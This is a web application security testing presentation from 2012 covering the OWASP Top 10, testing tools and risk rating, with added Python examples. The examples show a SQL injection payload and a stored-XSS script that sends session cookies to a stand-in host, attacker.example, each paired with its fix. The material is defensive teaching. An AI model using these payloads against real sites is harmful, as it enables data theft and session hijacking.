Web Application Security Testing - Aware in BugDay Bangkok 2012
1. “Quality is the link to Success” Copyright © 2012 Aware Corporation Ltd.
2. Agenda
   • What kind of application security vulnerabilities should be tested?
   • Methodology for testing
   • Open source tools available
   • Prioritizing application security defects
3. Testing Security in Web Applications
4. Case Studies
5. Web Application Security Testing
6. Different Security Standards
7. OWASP Top 10
   OWASP (Open Web Application Security Project) is an organization that provides unbiased and practical, cost-effective information about computer and Internet applications. Project members include a variety of security experts from around the world who share their knowledge of vulnerabilities, threats, attacks and countermeasures. http://www.owasp.org
8. OWASP Top 10 Testing
   Divided in 9 sub-categories, 66 controls:
   • Information Gathering
   • Configuration Management
   • Authentication
   • Session Management
   • Authorization
   • Business Logic
   • Data Validation
   • Denial of Service
   • Web Services
9. Top Attacks
   • SQL Injection – SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database.
   • Cross Site Scripting – Cross-site scripting (XSS) is a type of vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.
   • Authentication – Authentication and session management includes all aspects of handling user authentication and managing active sessions. Authentication is a critical aspect of this process, but even solid authentication mechanisms can be undermined by flawed credential management functions.
10. SQL Injection (diagram: attacker → firewall → hardened OS → web server → app server → custom code → databases, legacy systems, web services, directories; the application's "Account:" / "SKU:" form)
    1. Application presents a form to the attacker
    2. Attacker sends an attack in the form data
    3. Application forwards attack to the database in a SQL query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
    4. Database runs query containing attack and sends encrypted results back to application
    5. Application decrypts data as normal and sends results to the user
    Result: Account Summary listing every account (Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293)
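The five steps of the slide, as an added worked example that is not part of the original deck: an in-memory SQLite table of accounts (constructed sample data), a lookup that pastes the form field into the SQL text exactly as step 3 describes, and the same lookup with a bound parameter. The payload is the slide's `' OR 1=1--`; the `--` comments out the closing quote the application appends, so the WHERE clause becomes always-true and every row comes back.

```python
import sqlite3

# Constructed sample data standing in for the deck's "accounts" table.
ACCOUNTS = [
    ("5424-6066-2134-4334", "alice", 1200.00),
    ("4128-7574-3921-0192", "bob", 310.50),
    ("5424-9383-2039-4029", "carol", 98.00),
]

# The payload from the slide: closes the quoted literal, ORs in a tautology,
# and comments out whatever the application appends after the input.
PAYLOAD = "' OR 1=1--"


def make_db():
    """Build the in-memory database the examples query (sample data, constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct TEXT PRIMARY KEY, owner TEXT, balance REAL)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return conn


def lookup_vulnerable(conn, acct):
    """Step 3 of the slide: the form field is concatenated into the SQL text.

    With acct = PAYLOAD the statement sent to the database is
        SELECT acct, owner, balance FROM accounts WHERE acct='' OR 1=1--'
    which matches every row.
    """
    sql = "SELECT acct, owner, balance FROM accounts WHERE acct='" + acct + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, acct):
    """Same query with a bound parameter: the input is data, never SQL.

    The database receives the literal string "' OR 1=1--" as the account
    number to compare against, so the payload matches nothing.
    """
    sql = "SELECT acct, owner, balance FROM accounts WHERE acct=?"
    return conn.execute(sql, (acct,)).fetchall()


def injection_signal(conn, payload=PAYLOAD):
    """Tester's check: does the payload return more rows than a legitimate lookup would?

    Returns (rows_for_payload, rows_for_unknown_account). A legitimate unknown
    account returns 0 rows; a count greater than that means the input reached
    the SQL parser.
    """
    return len(lookup_vulnerable(conn, payload)), len(lookup_vulnerable(conn, "no-such-acct"))


if __name__ == "__main__":
    db = make_db()
    print("legit   :", lookup_vulnerable(db, "4128-7574-3921-0192"))
    print("injected:", lookup_vulnerable(db, PAYLOAD))   # every account dumped
    print("safe    :", lookup_safe(db, PAYLOAD))         # []
```

The fix is the bound parameter in `lookup_safe`, not filtering quotes out of the input: the database never sees the payload as SQL. When testing, the signal to look for is exactly the one on the slide, a response that contains more records than the submitted account number could legitimately match.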
11. Cross Site Scripting (diagram: application with stored XSS vulnerability)
    1. Attacker sets the trap – "update my profile": attacker enters a malicious script into a web page that stores the data on the server
    2. Victim views page – sees attacker profile: script runs inside victim's browser with full access to the DOM and cookies
    3. Script silently sends attacker the victim's session cookie
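The three steps of the stored-XSS slide, as an added example that is not code from the original deck: a dictionary stands in for the server's profile store, one renderer pastes the stored text into the page unencoded, the other HTML-entity-encodes it, and a `Set-Cookie` helper shows the HttpOnly flag that stops step 3 (the script reading `document.cookie`). The payload, the `attacker.example` host and the `SESSIONID` cookie name are constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload: loads an "image" from the attacker's host with the
# victim's cookies in the query string (step 3 of the slide).
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"

# Stand-in for the server-side profile store (constructed, not the deck's code).
PROFILES = {}


def update_profile(user, about_me):
    """Step 1: the server stores whatever the attacker typed, unmodified."""
    PROFILES[user] = about_me


def render_profile_vulnerable(user):
    """Step 2: stored text is placed into the HTML without encoding, so a
    <script> tag in it is parsed as markup and runs in every viewer's browser."""
    return "<h1>%s</h1><p>%s</p>" % (user, PROFILES[user])


def render_profile_safe(user):
    """Entity-encode untrusted data before placing it in element content:
    '<' becomes '&lt;', so the browser shows the text instead of executing it."""
    return "<h1>%s</h1><p>%s</p>" % (html.escape(user), html.escape(PROFILES[user], quote=True))


def script_executes(page, payload):
    """Tester's check: the payload appearing verbatim in the response means it
    survived as live markup; an encoded copy would no longer match."""
    return payload in page


def session_cookie_header(session_id):
    """Issue the session cookie with HttpOnly (script cannot read it) and
    Secure (sent only over TLS), so even a successful injection cannot
    exfiltrate the session via document.cookie."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["path"] = "/"
    return cookie.output(header="Set-Cookie:").strip()


if __name__ == "__main__":
    update_profile("mallory", PAYLOAD)
    print(render_profile_vulnerable("mallory"))   # script tag intact
    print(render_profile_safe("mallory"))         # &lt;script&gt;... shown as text
    print(session_cookie_header("abc123"))
```

Encoding at the point of output is the primary fix; HttpOnly is defence in depth that narrows what a successful injection can steal, not a substitute for encoding, since the injected script can still act as the victim inside the page.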
12. Authentication
13. Tools Overview
14. Tools
    • Proxies
      – Burp Suite
      – Paros
      – WebScarab
      – Fiddler
    • FoxyProxy plugin
    • Open source scanners
      – Skipfish
15. Burp Suite http://portswigger.net/proxy/
16. FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/2464/
17. Skipfish – A fully automated, active web application security reconnaissance tool
    * Server-side SQL injection (including blind vectors, numerical parameters).
    * Stored and reflected XSS
    * Directory listing bypass vectors.
    * External untrusted embedded content.
    http://code.google.com/p/skipfish/
18. Cheat Sheet
19. Cheat Sheet
20. Tools Demonstration
21. RISK
    • Discovering vulnerabilities is important, but just as important is being able to estimate the associated risk to the business.
    Risk = Likelihood * Impact
22. Prioritizing RISK
23. Threat Risk (DREAD)
    D amage potential
    R eproducibility
    E xploitability
    A ffected users
    D iscoverability